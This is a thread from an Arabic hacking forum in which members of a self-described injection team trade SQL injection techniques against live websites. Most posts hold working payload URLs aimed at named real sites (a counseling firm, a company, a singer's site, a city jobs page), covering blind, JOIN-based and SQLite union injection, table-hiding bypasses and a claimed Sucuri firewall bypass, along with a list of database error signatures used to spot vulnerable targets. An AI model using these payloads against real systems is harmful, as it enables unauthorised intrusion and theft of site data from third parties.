TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > القسم الاخباري والتقني > قسم الأخبار التقنية والنقاشات الجادة

قسم الأخبار التقنية والنقاشات الجادة طرح جميع النقاشات الجادة والاخبار اليوميه التي تخص اختراق المواقع وتبعاتها ...

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 11-08-2017, 11:21 PM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء



السلام عليكم ورحمة الله

هذا نقاش نتمنى من الله أن يكون مٌثمر فى المجال ونٌحب مشاركة باقى أعضاء المٌنتدى الكرام به

تحت مٌسمى

نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة فريق تطوير الحقن على مستوي الأمة الإسلامية والعربيه الـ ghi المؤسس مٌنذ 7 سنوات مع باقى اعضاء المنتدى ليٌصبح نقاش شامل فى النهاية


نقاط النقاش ترتكز بشكل أساسي بمجال الحقن لا غير


مٌدة المناقشة 14 يوم كا حد أدنى


نقاط المناقشه الأساسية والباقي يأتى تباعاً بالموضوع والردود


1- بعض الأخوة مٌنذ زمن ليس بالبعيد أرسل موقع قام بتطبيق نظام حماية جديد لأول مرة علميا
وهو نظام الإخفاء القصري للجداول الحساسة مثل جداول الأعضاء والأدمن

السؤال هل لهذه الحماية من حل جذري أم سوف نقف أمامها عاجزين

2- هل يٌمكن تطبيق رفع مركز تحميل بالمواقع المصابة عن طريق الحقن ورفع شل
وهل هذا الأمر فعلا سوف ينجح مع المثال علي نجاح زرع المركز


3- هل يوجد شئ اسمة مواقع يستحيل حقنها ولماذا إن وجد مع المثال العملي وما هي الطٌرق البديله لحقنه


4- هل توجد إلي الأن بعد التطوير الكبير الذي قام به فريق GHI والهاكرز على مستوي العالم تقنيات بريفت فى هذا المجال وهل لديك منها شئ وهل تسمح بتقديمها للجميع الأن إن لم تفعل فلماذا تحجب هذا الخير عن الاخوة العرب والمسلمين ؟


5- من المعروف أن المواقع المصابه بنعرفها عن طريق وضع اشارة كومة بعد الموقع وبيظهر الخطاء فماذا عن المواقع التي عند وضع اشارة ' كومة معا تعطي Forbidden هل هي مصاب ام ماذا ؟

مثال

كود PHP:
www.corpwatch.org/article.php?id=376&printsafe=1
6- ما هي أقوي تقنية حماية ضد ثغرات الحقن والتي يستحيل الحقن معها بصورة كامله مع ذكر أمثله مفصلة الشرح


7- على حسب طلب الأعضاء


8- على حسب طلب الأعضاء


9- على حسب طلب الأعضاء


10- على حسب طلب الأعضاء


بالتوفيق والسداد للجميع

 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
18 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
  #2  
قديم 11-08-2017, 11:45 PM
الصورة الرمزية aircrack -ng
aircrack -ng
:: عضو خاص ::
 
حـالة التــواجـد : aircrack -ng غير متواجد حالياً
تاريخ التسجيل: Jun 2013
مكـان الإقامـة : sec4ever
الجــــنــــــس: ذكـر
المشاركات: 246
شكراً:691
تم شكره 1,698 مرة في 201 مشاركة
معدل تقييم المستوى: 0
aircrack -ng بدون تقييم
افتراضي رد: نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء

بالنسبة للسؤال الثالث
مواقع يستحيل حقنها او صعب حقنها وماهو البديل
ناخذ على سبيل المثال موقع مصاب

العواميد 1

كود PHP:
http://www.mcmilliancounseling.com/members.php?u=.1' +/*!50000UNION*//**x**/SELECT+0x313131313131313131313131 and '1'='2 
احنا لو نحول لايرور بازيد راح يطلع خطا

الحل انو نلجاء لاستغلاله بليند سكيول او تايم بازيد حسب الحالة

مثال

كود PHP:
http://www.mcmilliancounseling.com/members.php?u=1%27%20/*!50000and*/%20ascii%28substring%28%28select%20/*!50000table_name*/%20/*!50000from*/%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,1,1%29%29%3E50--%20- 
مافيش خطا



كود PHP:
http://www.mcmilliancounseling.com/members.php?u=1%27%20/*!50000and*/%20ascii%28substring%28%28select%20/*!50000table_name*/%20/*!50000from*/%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,1,1%29%29%3E110--%20- 
طلع خطا وهنا عندنا اكمكانية استغلاله بليند  

 

 

يامن بدنياه انشغل وغره طول الامل الموت يأتي بغتة والقبر صندوق العمل
رد مع اقتباس
6 أعضاء قالوا شكراً لـ aircrack -ng على المشاركة المفيدة:
  #3  
قديم 12-08-2017, 12:05 AM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي رد: نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء

بسم الله والحمد لله والصلاة والسلام على رسول الله

سوف أبدء بفضل الله واختار السؤال رقم واحد للإجابة عليه


1- بعض الأخوة مٌنذ زمن ليس بالبعيد أرسل موقع قام بتطبيق نظام حماية جديد لأول مرة علميا
وهو نظام الإخفاء القصري للجداول الحساسة مثل جداول الأعضاء والأدمن

لقد قابلنى مثل هذه الحماية من قبل بإرسال أحد الإصدقاء موقع لي مصاب يطبق هذا الحماية
وطلب منى إظهار الجداول المخفيه كلها فرددت على الأخ السائل على النحو التالي


بشكل عام، في قواعد بيانات mysql لدينا نوعان من علامات التبويب : اي انواع محتوايات القواعد من الجداول


عندنا نظام أسمه System View ونظام أسمة Base Table


النظام الأول System View يحتوي كل جداول النظام أي جداول التأسيس
لقواعد البيانات System Tables


النظام الثاني Base Table يحتوي كل جداول الاعضاء والأدمن أي جداول التفاعل
ضمن الموقع User Tables


وهذا كٌله يطلق علية إسم العملية table typs


ويمكننا أن نسئل قاعدة البيانات عن نظام القواعد بشكل عملي عن طريق الإستعلام التالي


كود PHP:
testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,(table_type),8,9,10,\N from information_Sch***ema.tables  -- - 





كما نرى أجابة قاعدة البيانات كما شرحت تماما منذ قليل على انواع الجداول التى بالقواعد ضمن الموقع


نظام الجداول الخاص بالنظام SYSTEM VIEW يحتوى فقط الجداول الخاصة بالسيستم لاغير فلو أرضنا تفحصها وإظهارها جميعا سوف يكون عن طريق الإستعلام التالي



كود PHP:
testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,group_concat(table_name,'<br>' Separator 0x20),8,9,10,\N from information_Schema.tables where table_type='SYSTEM VIEW'   -- - 





ظهرت كما نرى كل جداول السيستم حسناً ماذا عن جداول الأعضاء والأدمن يمكن إستدعائها عن طريق الإستعلام التالي


كود PHP:
testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,group_concat(table_name,'<br>' Separator 0x20),8,9,10,\N from information_Schema.tables where table_type='BASE TABLE'   -- - 




وعليه بنفس التقنيه بتطبيق إستعلام الـ DIOS تمكنا من إجبار النظام بالكشف عن كل الجداول التى نبحث عنها عن طريق التحايل على الحماية والطلب لكافة الجداول بتصريح قبول خارج نطاق الحماية


كود PHP:
testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,CASE table_type and auto_increment and ENGINE WHEN table_type='Base Table' THEN '<h3>Ahmed El Melegy</h3><br><hr><h1>Gaza Hacker Team</h1>' WHEN auto_increment=39 THEN a.table_name WHEN ENGINE='Myisam' OR ENGINE='System View' THEN 1=ELSE CASE WHEN b.Table_name like 'Users' THEN column_name END END,8,9,10,\N from information_Schema.tables as a,information_Schema.columns as -- - 




ويوجد نظام أخر يسمى المحرك ENGINE كما ضمن الإستعلام الأخير وسوف أشرحهٌ بالتفصل أنا والأخ aircrack -ng في كتابنا الجديد تبع الفريق ghi



يكفي هذا الشرح كرد على السؤال الأول وعند أول وقت فراغ لي غدا إن شاؤ الله ارد على بعض هذه الإسئلة مع الأخ aircrack -ng



في إنتظار التفاعل من الأعضاء لإطفاء الحماس على الموضوع والتعلم من بعضا البعض وطرح المواضع الساخنه ضمن نطاق العمل هنا وطرح الاسئلة الأربع الاخيرة علينا وعلى بعضنا البعض




 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
9 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
  #4  
قديم 12-08-2017, 12:28 AM
الصورة الرمزية TopSat13
TopSat13

TeaM C
 
حـالة التــواجـد : TopSat13 غير متواجد حالياً
تاريخ التسجيل: Jan 2010
مكـان الإقامـة : byna win nskon
الجــــنــــــس: ذكـر
الــهـــوايـــــة: PTX
المشاركات: 165
شكراً:64
تم شكره 81 مرة في 26 مشاركة
معدل تقييم المستوى: 11
TopSat13 على طريق التميز
افتراضي رد: نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء

اقتباس:
المشاركة الأصلية كتبت بواسطة aircrack -ng مشاهدة المشاركة

بالنسبة للسؤال الثالث
مواقع يستحيل حقنها او صعب حقنها وماهو البديل
ناخذ على سبيل المثال موقع مصاب

العواميد 1

كود PHP:
http://www.mcmilliancounseling.com/members.php?u=.1' +/*!50000union*//**x**/select+0x313131313131313131313131 and '1'='2 
احنا لو نحول لايرور بازيد راح يطلع خطا

الحل انو نلجاء لاستغلاله بليند سكيول او تايم بازيد حسب الحالة

مثال

كود PHP:
http://www.mcmilliancounseling.com/members.php?u=1%27%20/*!50000and*/%20ascii%28substring%28%28select%20/*!50000table_name*/%20/*!50000from*/%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,1,1%29%29%3e50--%20- 
مافيش خطا



كود PHP:
http://www.mcmilliancounseling.com/members.php?u=1%27%20/*!50000and*/%20ascii%28substring%28%28select%20/*!50000table_name*/%20/*!50000from*/%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,1,1%29%29%3e110--%20- 
طلع خطا وهنا عندنا اكمكانية استغلاله بليند
شكرا لك على المشاركة اخونا في الله
هل هذا معناه أن المواقع الصعبة الحقن أو بستحيل حقنها بالطرق العادية نستطيع تطبيق الحقن الاعمي عليها وسوف تعمل كما ذكرت فى المثال ؟  

 

 

Salafi Electronic Shield
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ TopSat13 على المشاركة المفيدة:
  #5  
قديم 12-08-2017, 12:42 AM
الصورة الرمزية aircrack -ng
aircrack -ng
:: عضو خاص ::
 
حـالة التــواجـد : aircrack -ng غير متواجد حالياً
تاريخ التسجيل: Jun 2013
مكـان الإقامـة : sec4ever
الجــــنــــــس: ذكـر
المشاركات: 246
شكراً:691
تم شكره 1,698 مرة في 201 مشاركة
معدل تقييم المستوى: 0
aircrack -ng بدون تقييم
افتراضي رد: نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء

اقتباس:
المشاركة الأصلية كتبت بواسطة TopSat13 مشاهدة المشاركة

شكرا لك على المشاركة اخونا في الله
هل هذا معناه أن المواقع الصعبة الحقن أو بستحيل حقنها بالطرق العادية نستطيع تطبيق الحقن الاعمي عليها وسوف تعمل كما ذكرت فى المثال ؟
انا عطيت حالة من الحالات الي ممكن تواجهها مشاكل عديده
خلينا نتكلم شوي وناخذ كذا مثال
مثلا معانا موقع واستغلاله يكون باسلوب join او sqlite احنا راح نستغله الاستغلال العادي بعدين نقول صعب ولازم نتجه للبليند ده مش معقول
لازم في الاول نعرف احنا مع مين نتعامل

مثالين

الاول اسلوب join

كود PHP:

http
://www.kortmaninc.com/experience11%20and%200=1%20union%20select%20*%20from%20%28select%201%29a%20join%20%28select%202%29b%20join%20%28select%20group_concat%28table_name+SEPARATOR+0x3c62723e%29%20from%20information_schema+%252e+tables%29c%20join%20%28select%204%29d%20join%20%28select%205%29f%20join%20%28select%206%29g%20join%20%28select%207%29h%20join%20%28select%208%29j%20--%20- 
والثاني sqlite

كود PHP:
http://www.myriamfares.com/index.php?id=55++UNION+ALL+SELECT+1,tbl_name||%22::%22||sql,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from%20sqlite_master%20where%20type=%22table%22--&c=3 
 

 

 

يامن بدنياه انشغل وغره طول الامل الموت يأتي بغتة والقبر صندوق العمل
رد مع اقتباس
2 أعضاء قالوا شكراً لـ aircrack -ng على المشاركة المفيدة:
  #6  
قديم 12-08-2017, 12:58 AM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي رد: نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء

اقتباس:
المشاركة الأصلية كتبت بواسطة aircrack -ng مشاهدة المشاركة

انا عطيت حالة من الحالات الي ممكن تواجهها مشاكل عديده
خلينا نتكلم شوي وناخذ كذا مثال
مثلا معانا موقع واستغلاله يكون باسلوب join او sqlite احنا راح نستغله الاستغلال العادي بعدين نقول صعب ولازم نتجه للبليند ده مش معقول
لازم في الاول نعرف احنا مع مين نتعامل

مثالين

الاول اسلوب join

كود PHP:

http
://www.kortmaninc.com/experience11%20and%200=1%20union%20select%20*%20from%20%28select%201%29a%20join%20%28select%202%29b%20join%20%28select%20group_concat%28table_name+SEPARATOR+0x3c62723e%29%20from%20information_schema+%252e+tables%29c%20join%20%28select%204%29d%20join%20%28select%205%29f%20join%20%28select%206%29g%20join%20%28select%207%29h%20join%20%28select%208%29j%20--%20- 
والثاني sqlite

كود PHP:
http://www.myriamfares.com/index.php?id=55++UNION+ALL+SELECT+1,tbl_name||%22::%22||sql,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from%20sqlite_master%20where%20type=%22table%22--&c=3 
اكيد عزيزي كلامك سديد وفى محالة

يجب الحقن اولا وتجربة كل الطرق قبل التحويل للبليند

ويجب ايضا اننا منقلش على الموقع صعب او يستحيل حقنة واحنا بنحقنة باستعلامات مثلا mysql وهو اروكال اوبستجر

بعض الاخطاء والقواعد التابعه لها


كود PHP:

==================================================================================
MySQL returns unique error messages using illegal regexps:
==================================================================================

# MySQL server #
# MSSQL  Microsoft SQL Server #
# MS-Access || Microsoft Access #
# Oracle #
# PostgreSQL #
# Sybase #
# Interbase/Firebird #
# IBM DB2 #
# Informix #
# SQLite #
# SAP MaxDB #
# Ingres #
# HSQLDB #


==================================================================================
MySQL server

1
-You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax 

2
-"SQL syntax.*MySQL"
3-"Warning.*mysql_.*"
4-"valid MySQL result"
5-"MySqlClient\."
6-"com\.mysql\.jdbc\.exceptions"


7-warning mysql_fetch_array() supplied argument is not a valid mysql result resource in  

8
-warning mysql_fetch_assoc() expects parameter 1 to be resource boolean given in  

9
-warning mysql_num_rows() expects parameter 1 to be resource boolean given  

10
-warning mysql_num_rows() supplied argument is not a valid mysql result resource in  

11
-warning mysql_fetch_assoc() supplied argument is not a valid mysql result resource in  

12
-warning mysql_connect() function.mysql-connect can't connect to mysql server on  

13-warning mysql_result() expects parameter 1 to be resource boolean given in  

==================================================================================
MSSQL  Microsoft SQL Server

1-warning mssql_connect() function.mssql-connect unable to connect to server  

2-warning mssql_query function.mssql-query message invalid object name  

3-warning mssql_pconnect function mssql pconnect unable connect serve  

4-"Driver.* SQL[\-\_\ ]*Server"
5-"OLE DB.* SQL Server"
6-"(\W|\A)SQL Server.*Driver"
7-"Warning.*mssql_.*"
8-"(\W|\A)SQL Server.*[0-9a-fA-F]{8}"
9-"(?s)Exception.*\WSystem\.Data\.SqlClient\."
10-"(?s)Exception.*\WRoadhouse\.Cms\."

==================================================================================
MS-Access || Microsoft Access

1-Microsoft JET Database Engine error '
80004005' Unspecified error  

2-Microsoft OLE DB Provider for ODBC Drivers error '
80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '
id=66''.
/
product.aspline 106 

3
-"Microsoft Access (\d+ )?Driver"
4-"JET Database Engine"
5-"Access Database Engine"
==================================================================================
Oracle

1
-Warningoci_parse() [function.oci-parse]: ORA-01756une chaîne entre apostrophes ne se termine pas correctement in D:\wamp\www_mediaction\site\cfpb_reseau_france.php on line 14 

2
-"ORA-[0-9][0-9][0-9][0-9]"
3-"Oracle error"
4-"Oracle.*Driver"
5-"Warning.*\Woci_.*"
6-"Warning.*\Wora_.*"
==================================================================================
PostgreSQL

1
-Warningpg_query(): Query failedERRORunterminated quoted string at or near 

2
-"PostgreSQL.*ERROR"
3-"Warning.*\Wpg_.*"
4-"valid PostgreSQL result"
5-"Npgsql\."
6-"org\.postgresql\.util\.PSQLException"
==================================================================================
Sybase

1
-Warningsybase_query() [function.sybase-query]: SybaseServer messageUnclosed quote before the character string ' '. (severity 15procedure N/Ain /www/okfarmbureau/LFWSmartyPage.php on line 60 

2
-"(?i)Warning.*sybase.*"
3-"Sybase message"
4-"Sybase.*Server message.*"
==================================================================================
Interbase/Firebird

1
-Warningibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 as approximate floating-point values in SQL dialect 1but as 64-bit in \\deceasrv16\hca$\noticias\exibir_noticias.php on line 15 

2
-"Dynamic SQL Error"
3-"Warning.*ibase_.*"
==================================================================================
IBM DB2

1
-"CLI Driver.*DB2"
2-"DB2 SQL error"
3-"db2_\w+\("
==================================================================================
Informix

1
-"Informix"
2-"Exception.*Informix"
==================================================================================
SQLite

1
-"SQLite/JDBCDriver"
2-"SQLite.Exception"
3-"System.Data.SQLite.SQLiteException"
4-"Warning.*sqlite_.*"
5-"Warning.*SQLite3::"
6-"\[SQLITE_ERROR\]"
==================================================================================
SAP MaxDB

1
-"SQL error.*POS([0-9]+).*"
2-"Warning.*maxdb.*"
==================================================================================
Ingres

1
-"Warning.*ingres_"
2-"Ingres SQLSTATE"
3-"Ingres\W.*Driver"
==================================================================================
HSQLDB

1
-"org\.hsqldb\.jdbc"
================================================================================== 
 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
3 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
  #7  
قديم 12-08-2017, 02:44 AM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,672
شكراً:4,473
تم شكره 5,468 مرة في 1,365 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء

ما هي الحلول المقترحة للمواقع التي تشتغل تحت بروكسي مثل sucuri او غيره ,, بعيدا عن معرفة الإيبي الحقيقي للموقع كيف يمكن تجاوز الحماية؟.  
رد مع اقتباس
5 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #8  
قديم 12-08-2017, 03:20 AM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي رد: نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء

اقتباس:
المشاركة الأصلية كتبت بواسطة UzunDz مشاهدة المشاركة

ما هي الحلول المقترحة للمواقع التي تشتغل تحت بروكسي مثل sucuri او غيره ,, بعيدا عن معرفة الإيبي الحقيقي للموقع كيف يمكن تجاوز الحماية؟.


Bypass Sucuri WebSite Firewall(WAF) By GHI

بالنسبه للتخطي بإستخدام الأيبي تكمن المشكلة فى العثور على الأيبي الحقيقي للموقع لذا لا أراها طريقة فعاله للتخطي وسابقاً قد وجدت الأيبي الحقيقيي لأحد المواقع ولكن لم يتم التخطي لذا هي فعاله فقط بنسبة 5%

والطريقه المشهورة عوضاً عنها هي طريقة injection inside injection + Columns seperator Style
وفعاله بنسبة 40%


أما طريقتى المٌفضلة هي الحقن بالبوست فعالة بنسبة 75%


مثال عملي حي


كود PHP:
cityofelcampo.org/job_details.php?id=-45'union-- a%0Aselect!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23 
Access Denied - Sucuri Website Firewall

التخطي

الحقن بالبوست






 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
2 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
  #9  
قديم 12-08-2017, 03:34 AM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,672
شكراً:4,473
تم شكره 5,468 مرة في 1,365 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء

اقتباس:
المشاركة الأصلية كتبت بواسطة BlackRose-GHT مشاهدة المشاركة



Bypass Sucuri WebSite Firewall(WAF) By GHI

بالنسبه للتخطي بإستخدام الأيبي تكمن المشكلة فى العثور على الأيبي الحقيقي للموقع لذا لا أراها طريقة فعاله للتخطي وسابقاً قد وجدت الأيبي الحقيقيي لأحد المواقع ولكن لم يتم التخطي لذا هي فعاله فقط بنسبة 5%

والطريقه المشهورة عوضاً عنها هي طريقة injection inside injection وفعاله بنسبة 40%

أما طريقتى المٌفضلة هي الحقن بالبوست فعالة بنسبة 75%


مثال عملي حي



التخطي


كود PHP:
cityofelcampo.org/job_details.php?id=-45'union-- a%0Aselect!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23 


عبر البوست فقط في حالة اذا كان يستخدم $_REQUEST ك input
ماذا ان كان يستخدم $_GET فقط؟

هل يمكن ان تشرح اكثر حول injection inside injection.  
رد مع اقتباس
2 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #10  
قديم 12-08-2017, 03:43 AM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي رد: نقاش إبجابي بين الأخ BlackRose-GHT والأخ aircrack -ng قادة الـ ghi وباقى الاعضاء

اقتباس:
المشاركة الأصلية كتبت بواسطة UzunDz مشاهدة المشاركة

عبر البوست فقط في حالة اذا كان يستخدم $_REQUEST ك input
ماذا ان كان يستخدم $_GET فقط؟

هل يمكن ان تشرح اكثر حول injection inside injection.
الشرح رقم ثلاثة بموضوعي هذا عزيزي يمكنك المٌتابعه من هٌنا
كود PHP:
http://www.sec4ever.com/home/showthread.php?t=18731 

مع ملاحظة إن حصل واف من البداية على أعداد الأعمدة عند كتابة الإستغلال نقوم بإضافة seperator ~ إلي ارقام الأعمدة واحدا تلو الأخر من البداية إلي النهاية حتى يذهب الخطاء لكى نتمكن من تنفيذ الأٌسلوب


كود PHP:
=4'*2e9unioN Select!1,2,3,4,5,0x27,7,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,28,29,30%23 


كود PHP:
=4'*2e9unioN  Select!1,2,3,4,5,0x6c656c276f72646572206279203123,7,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,28,29,30%23 
 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[Hungarian] Using Aircrack-ng Sec4ever قسم جديد ثغرات مواقع الحماية 0 03-04-2010 12:54 AM


الساعة الآن 11:05 PM